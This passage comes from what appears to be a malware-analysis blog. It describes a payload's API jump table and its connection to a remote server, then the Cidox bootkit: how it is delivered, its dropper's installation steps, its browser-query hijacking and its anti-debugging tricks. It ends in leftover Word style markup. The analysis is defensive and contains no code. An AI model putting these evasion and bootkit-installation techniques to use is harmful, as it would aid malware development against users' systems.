<div style="text-align: center;">
<i>Decryption in rundll32</i></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Another interesting feature of this payload is in the way it calls for the APIs it needs. It initially sets up a jump table that points to single function that performs the call (<i>specifically a jmp</i>) varying only in the values it pushes. It is highly possible that it enforces this type of calling method in order to prevent researchers to easily identify the calls it uses and to quickly analyze the contents of its body.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidP0A794KQB7d8eNwJf2Euc1KzMeuUZPWZ-PrFw-eQM6jCCBv6Aqfka2UEcrLHGeAICTxsqPLB2q03axPNIXwzdch4qPPiRC-nOZj1DFGUOrUaHUragKNyNC2qIxLcX06ef9HIfkVs1lE/s1600/jmptable.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidP0A794KQB7d8eNwJf2Euc1KzMeuUZPWZ-PrFw-eQM6jCCBv6Aqfka2UEcrLHGeAICTxsqPLB2q03axPNIXwzdch4qPPiRC-nOZj1DFGUOrUaHUragKNyNC2qIxLcX06ef9HIfkVs1lE/s320/jmptable.jpg" width="260" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsnuMJEVht1WPZgWLUAZkAg-ghizhQqSfJlNnEdJHXRNu8cRkRCzyi34WkUvf_b8yccOQJ3clK25PftFdeA1yZVmvOf5MDRb1ZoG2IlbUy8eiRqRyX3_jwTC6u_qTdGriXlKLUKMFSKSA/s1600/jmpeax.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="93" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsnuMJEVht1WPZgWLUAZkAg-ghizhQqSfJlNnEdJHXRNu8cRkRCzyi34WkUvf_b8yccOQJ3clK25PftFdeA1yZVmvOf5MDRb1ZoG2IlbUy8eiRqRyX3_jwTC6u_qTdGriXlKLUKMFSKSA/s320/jmpeax.jpg" width="320" /></a></div>
<br />
<div style="text-align: left;">
</div>
<br />
<br />
<div style="text-align: center;">
<i>Jump table for calling API</i></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
While its previous characteristics are trivial, the main purpose of this payload is to connect to a remote server that can be used or is being used for <b><i>targeted attacks</i></b>. It connects and listens to a remote IP address <b><i>111.68.9.93</i></b></div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilGBFa6IUcYy8HQQYZfCxdsyIit1iovnqnmS7E-7xb5LwglHYFEpzxaMk23nL0axFKdlbNUElpxVfBfAeAqaYKH6QBa4x0Ez6SKhuv-vQeNdmCHMCn0ux-2Yd36LY5lbDe-YzJTtuXYTs/s1600/connect111.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilGBFa6IUcYy8HQQYZfCxdsyIit1iovnqnmS7E-7xb5LwglHYFEpzxaMk23nL0axFKdlbNUElpxVfBfAeAqaYKH6QBa4x0Ez6SKhuv-vQeNdmCHMCn0ux-2Yd36LY5lbDe-YzJTtuXYTs/s400/connect111.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVYQSHVDUPw5rwbmGbRDtmZPF6I5GlViXqHUWm18L0FcYBYf1m_jreVRFOVI07gu8aYylyAEzFlvhLYErLm-gaTW1LGY3mQuH5v8_uwyInxZCDSPG_VPxuvx2-L96_1-crojc4TLaFrTQ/s1600/connect.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVYQSHVDUPw5rwbmGbRDtmZPF6I5GlViXqHUWm18L0FcYBYf1m_jreVRFOVI07gu8aYylyAEzFlvhLYErLm-gaTW1LGY3mQuH5v8_uwyInxZCDSPG_VPxuvx2-L96_1-crojc4TLaFrTQ/s400/connect.jpg" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: center;">
<i>Connects to a remote server</i><br />
<br />
<br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/15262957865496243491noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-45161505086139567352013-11-11T00:13:00.002-08:002013-11-11T07:20:39.684-08:00CIDOX Bootkit<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">There
has been a growth of the use of bootkit in recent years and it has been an
annoyance and a source of frustration of many computer users today. A bootkit,
strictly speaking, refers to a set of programs that loads itself before the
operating system does. It provides flexible means to hide its activities or
modify key components that are not accessible normally. By modifying the
initial boot loader of the hard drive it can bypass detection from most
traditional AV vendors and perform kernel level operations not normally
available on user level programs. Because of these, bootkits are generally hard
to remove as they require extensive study as to how to restore the original MBR
or partition.</span></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Such
is the case of Cidox.</span></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="font-family: Times,"Times New Roman",serif;"><br /></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">This
malware initially arrives as a single downloaded executable file, whether via <i style="mso-bidi-font-style: normal;">drive-by-download</i>, exploits or any other
possible means. It carries within itself vital components to successfully
infiltrate and compromise the system. Excluding the dropper, its tools are the boot
loader (bootkit), the rootkit drivers (w32/w64), shutdown file and the attribute modifier.</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDrlJtM0VTSZuZFe6xWnkAqAzxAjcKhBQmCnmg32j34bGr6Jj_K5rnrXcUYCzB5RTNdmyT5SoJyhfAVAduVHphtkqOpV9X82iPhM_k8En6hLmvCP0Tpqmkr9nA34Wzu6-JKxSkWIUSqvs/s1600/all.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDrlJtM0VTSZuZFe6xWnkAqAzxAjcKhBQmCnmg32j34bGr6Jj_K5rnrXcUYCzB5RTNdmyT5SoJyhfAVAduVHphtkqOpV9X82iPhM_k8En6hLmvCP0Tpqmkr9nA34Wzu6-JKxSkWIUSqvs/s400/all.jpg" width="400" /></a></div>
<div style="text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><i> Cidox in the middle</i></span></span></div>
</div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><br /></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">The
main purpose of this malware is to intercept, modify and gather information on
the search requests made by the unsuspecting user. By modifying the volume boot record of an NTFS drive, it utilizes its rootkit, loads and sets up a library that monitors specific browsers and redirects
their queries on a remote location. It has the capability to modify a webpage
seen by users on their browsers. It has also been reported that it uses the
said technique to hold the system ransom, and trick the user into believing
that they need to pay a monetary amount to remove an infection on their system.</span></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="font-family: Times,"Times New Roman",serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipN3df7QMnNmbn5bFFcYecPozlXoNkqrPgqnmisiNJS8bzA-4MzOWcT9cSyaKgYZhiffDCkIziuGjqmGaY2sC0omYYaYaVpBPDWC1SGgtVhoukDGD2Prf8S7rcFdtj6IiMCuloM5Qjd48/s1600/browsers.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipN3df7QMnNmbn5bFFcYecPozlXoNkqrPgqnmisiNJS8bzA-4MzOWcT9cSyaKgYZhiffDCkIziuGjqmGaY2sC0omYYaYaVpBPDWC1SGgtVhoukDGD2Prf8S7rcFdtj6IiMCuloM5Qjd48/s320/browsers.jpg" width="320" /></a></div>
<span style="font-family: Times,"Times New Roman",serif;"></span>
<br />
<ul type="disc">
</ul>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"></span></div>
<div style="text-align: center;">
<i><span style="font-family: Times,"Times New Roman",serif;">Browsers monitored by Cidox</span></i></div>
<br />
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">The
following section describes in technical detail what each Cidox component does. </span></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="font-family: Times,"Times New Roman",serif;"><br /></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="font-family: Times,"Times New Roman",serif;"><br /></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">DROPPER</span></b></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><br /></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Upon
execution, it will perform the following actions to install the components in
the said order</span></span></div>
<ul>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Check for windows version </span></span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Copy the w32 or w64 version of rootkit in memory</span></span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Write it directly on hard drive</span></span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Modify the boot loader of the hard drive to load the
written rootkit</span></span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Create and execute a small file to force restart the
system</span></span></li>
<li><span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: "Times New Roman"; mso-fareast-language: EN-US;">Modify attributes and delete self</span></span></li>
</ul>
<span style="font-family: Times,"Times New Roman",serif;"></span>
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmA4oVXsSmxSy1rHv9XNn4limnYaauJ5ZMT4wMQF8Rt_xunUwwJ14wgjarJmTByhEuC4hS4uQHrJUG3B4n7q85qKX_ALT3KiXNAJ3nzE89PNTDdwPeIO7IdbNdYQJeLHqxRzqJKU5W2i8/s1600/flow.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmA4oVXsSmxSy1rHv9XNn4limnYaauJ5ZMT4wMQF8Rt_xunUwwJ14wgjarJmTByhEuC4hS4uQHrJUG3B4n7q85qKX_ALT3KiXNAJ3nzE89PNTDdwPeIO7IdbNdYQJeLHqxRzqJKU5W2i8/s320/flow.jpg" width="320" /></a></span></div>
<div style="text-align: center;">
<i>Overview of dropper</i></div>
<br />
<br />
<br />
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">This
executable employs anti-debugging tricks to avoid being emulated and analyzed. For one, it uses the classic large, almost infinite
loop which does nothing. This is because most emulators avoid loop due to engine performance issues. In
conjunction with the previous trick, it uses the GetTickCount API to know if it
is being debugged and if so, will modify the first few bytes of its main
function so that execution will not continue. This can be easily defeated by
bypassing the code or modifying the registers. </span></span></div>
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlGqDhGhq4zQU-Znvke_L9xmjZrM5w2gTzjE6PpR98lnETgFJXBOErebiALrrw03iPrIvR0Vpz-_vThDsmhbIfyJ8FKjy1p3jOJzZGnbBjoXiGfQ5OU32NzwRXs-tILCTGgD7Vk_bElhs/s1600/antidebug1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlGqDhGhq4zQU-Znvke_L9xmjZrM5w2gTzjE6PpR98lnETgFJXBOErebiALrrw03iPrIvR0Vpz-_vThDsmhbIfyJ8FKjy1p3jOJzZGnbBjoXiGfQ5OU32NzwRXs-tILCTGgD7Vk_bElhs/s400/antidebug1.jpg" width="400" /> </a></span></div>
<div style="text-align: center;">
<i><span style="font-family: Times,"Times New Roman",serif;">Overwriting of function if it assumes it is being debugged</span></i></div>
<br />
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
